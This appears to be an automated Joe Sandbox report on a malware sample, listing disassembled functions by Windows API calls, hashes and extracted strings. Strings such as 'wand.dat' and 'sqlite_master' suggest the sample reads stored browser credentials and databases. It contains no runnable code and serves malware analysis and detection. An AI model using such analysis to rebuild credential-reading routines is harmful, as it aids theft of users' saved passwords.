                                                                                                                                                                                                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1889144086-0
                                                                                                                                                                                                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1661045500-0
                                                                                                                                                                                                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                    • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                                    • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                                    • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                                    • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1549203181-0
                                                                                                                                                                                                                                    • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3550944819-0
                                                                                                                                                                                                                                    • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$free
                                                                                                                                                                                                                                    • String ID: g4@
                                                                                                                                                                                                                                    • API String ID: 2888793982-2133833424
                                                                                                                                                                                                                                    • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                                                                    • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                                                                    • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1127616056-0
                                                                                                                                                                                                                                    • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                                    • String ID: sqlite_master
                                                                                                                                                                                                                                    • API String ID: 438689982-3163232059
                                                                                                                                                                                                                                    • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3917621476-0
                                                                                                                                                                                                                                    • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 822687973-0
                                                                                                                                                                                                                                    • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75C4DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,75C4DF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0041747F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                                                                    • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
